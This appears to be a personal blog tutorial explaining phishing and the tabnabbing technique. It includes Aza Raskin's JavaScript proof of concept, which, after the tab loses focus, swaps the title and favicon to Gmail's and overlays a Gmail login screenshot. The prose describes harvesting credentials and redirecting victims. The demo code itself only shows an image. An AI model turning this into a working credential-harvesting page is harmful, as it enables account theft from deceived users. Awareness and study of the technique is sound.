Hey guys,this time i came up with concept of Hacking.I have been into Ethical Hacking since a long time and i love it(FYI : i dont do illegal hacking).And this tutorial is for educational purposes only,to bring awareness,and not intended to encourage hacking.
OK ,Before going deep into the experiment ,first i will tell you what actually phishing is.
What is Phishing?
Phishing is one of the ways of Hacking. Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details from the users through a Fake Webpage(Facebook,gmail,bank etc).
Earlier Hackers used to send links of fake pages which are hosted in their web servers accounts.When users click that link,fake page opens ,it looks exaclty like the Orginal Login Pages, When they enter the login credentials in that fake page,hackers used to get those details.
But due to some awareness about hacking in the recent days,people are suspecting the links which are not familiar.So phishing became very difficult for hackers.
So came up with the latest technique of Phishing also know as TAB NABBING(coined by Aza Raskin).
What is TAB NABBING?
To describe it,i will take example of GMAIL Login Page.
-A user navigates to your normal looking site.
-You detect when the page has lost its focus and hasn’t been interacted with for a while.
-Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like.
This can all be done with just a little bit of Javascript that takes place instantly.
As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open.
When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in.
After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail.
Because they were never logged out in the first place, it will appear as if the login was successful.
So the Fake Page looks like this .
For Experimenting I am providing the Code for this .All you have to do is ,copy the code in nodepad,save it with some name like Demo.html,open the page in a browser(best is google chrome),then click new tab, wait for 5 or more seconds,come back to the same page,
Magic.!!!!!
it will be loaded with GMAIL Page(Actually an image)
Code:
<html>
<head>
<script>
/*Copyright (c) 2010 Aza Raskin,Permission is hereby granted,free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.*/
(function(){
var TIMER = null;
var HAS_SWITCHED = false;
// Events
window.onblur = function(){
TIMER = setTimeout(changeItUp, 5000);
}
window.onfocus = function(){
if(TIMER) clearTimeout(TIMER);
}
// Utils
function setTitle(text){ document.title = text; }
// This favicon object rewritten from:
// Favicon.js – Change favicon dynamically [http://ajaxify.com/run/favicon].
// Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera.
favicon = {
docHead: document.getElementsByTagName(“head”)[0],
set: function(url){
this.addLink(url);
},
addLink: function(iconURL) {
var link = document.createElement(“link”);
link.type = “image/x-icon”;
link.rel = “shortcut icon”;
link.href = iconURL;
this.removeLinkIfExists();
this.docHead.appendChild(link);
},
removeLinkIfExists: function() {
var links = this.docHead.getElementsByTagName(“link”);
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type==”image/x-icon” && link.rel==”shortcut icon”) {
this.docHead.removeChild(link);
return; // Assuming only one match at most.
}
}
},
get: function() {
var links = this.docHead.getElementsByTagName(“link”);
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type==”image/x-icon” && link.rel==”shortcut icon”) {
return link.href;
}
}
}
};
function createShield(){
div = document.createElement(“div”);
div.style.position = “fixed”;
div.style.top = 0;
div.style.left = 0;
div.style.backgroundColor = “white”;
div.style.width = “100%”;
div.style.height = “100%”;
div.style.textAlign = “center”;
document.body.style.overflow = “hidden”;
img = document.createElement(“img”);
img.style.paddingTop = “15px”;
img.src = “https://hemanthtech.files.wordpress.com/2012/12/gmail.png”;
var oldTitle = document.title;
var oldFavicon = favicon.get() || “/favicon.ico”;
div.appendChild(img);
document.body.appendChild(div);
img.onclick = function(){
div.parentNode.removeChild(div);
document.body.style.overflow = “auto”;
setTitle(oldTitle);
favicon.set(oldFavicon)
}
}
function changeItUp(){
if( HAS_SWITCHED == false ){
createShield(“https://mail.google.com”);
setTitle( “Gmail: Email from Google”);
favicon.set(“https://mail.google.com/favicon.ico”);
HAS_SWITCHED = true;
}
}
})();
</script>
</head>
<body><h1>Hemanth Chalumuri</h1><p id=”demo”>Now open a new tab,come back to this page again after 5 seconds</p></body>
</html>
Kool isnt it??
Try this you will get a good idea about phishing.If u have any doubts feel free to contact me.
Hemanth Chalumuri 
